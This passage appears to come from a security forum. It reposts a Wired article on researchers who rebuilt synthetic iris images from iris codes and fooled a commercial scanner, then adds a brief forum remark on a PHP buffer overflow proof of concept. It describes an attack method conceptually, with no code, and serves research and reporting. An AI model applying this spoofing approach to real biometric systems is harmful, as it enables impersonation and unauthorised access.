iteration) to the iris code being reconstructed,” Galbally says. It takes the algorithm between 100-200 iterations to produce an iris image that is “sufficiently similar” to one the researchers are trying to reproduce. Since no two images of the same iris produce the same iris code, iris recognition systems use a “similarity score” to match an image to the iris code. The owner of the scanner can set a threshold that determines how similar an image needs to be to the iris code to call it a match. The genetic algorithm examines the similarity score given by the recognition system after each iteration and then improves the next iteration to obtain a better score. “The genetic algorithm applies four … rules inspired in natural evolution to combine the synthetic iris images of one iteration in such a way … that they produce new and better synthetic iris images in the next generation — the same way that natural species evolve from generation to generation to adapt better to their habitat but in this case it is a little bit faster and we don´t have to wait millions of years, just a few minutes,” Galbally says. Galbally says it takes about 5-10 minutes to produce an iris image that matches an iris code. He noted, though, that about 20 percent of the iris codes they attempted to recreate were resistant to the attack. He thinks this may be due to the algorithm settings. Once the researchers perfected the synthetic images, they then scanned them against a commercial iris recognition system, and found that the scanner accepted them as matching iris images more than 80 percent of the time. They tested the images against the VeriEye iris recognition system made by Neurotechnology. VeriEye’s algorithm is licensed to makers of iris-recognition systems and recently ranked among the top four in accuracy out of 86 algorithms tested in a competition by the National Institute of Standards and Technology. A Neurotechnology spokeswoman said there are currently 30-40 products using VeriEye technology and more are in development. The iris codes the researchers used came from the Bio Secure database, a database of multiple kinds of biometric data collected from 1,000 subjects in Europe for research use by academics and others. The synthetic images were obtained from a database developed at West Virginia University. After the researchers had successfully tricked the VeriEye system, they wanted to see how the reconstructed images would fare against real people. So they showed 50 real iris images and 50 images reconstructed from iris codes to two groups of people — those who have expertise in biometrics those who are untrained in the field. The images tricked the experts only 8 percent of the time, but the non-experts were tricked 35 percent of the time on average, a rate that is very high given there is a 50/50 chance of guessing correctly. It should be noted that even with their high rate of error, the non-expert group still scored better than the VeriEye algorithm. The study assumes that someone conducting this kind of attack would have access to iris codes in the first place. But this might not be so hard to achieve if an attacker can trick someone into having their iris scanned or hacks into a database containing iris codes, such as the one that B12 technologies maintains for the FBI. BI2 states on its web site that the iris images in its database are “encrypted using strong cryptographic algorithms to secure and protect them,” but the company could not be reached to obtain details about how exactly it secures these images. Even if BI2?s database is secure, other databases containing iris codes may not be. Solution: The picture at the top of the post is a synthetic iris image. In the first set of images below that, the one on the left is real, the other synthetic. In the second set of images, the one on left is real, the one on right synthetic. And this final one? Authentic. Look hard, and you can even see the contact lens surrounding the iris. Sursa: Reverse-Engineered Irises Look So Real, They Fool Eye-Scanners | Threat Level | Wired.com
-
PHP 6.0 openssl_verify() Local Buffer Overflow PoC
Nytro replied to DarkyAngel's topic in Exploituri
EIP 00410041 E dubios, s-ar putea exploata, dar ce sunt acele 0-uri intre fiecare caracter? Pare stack overflow.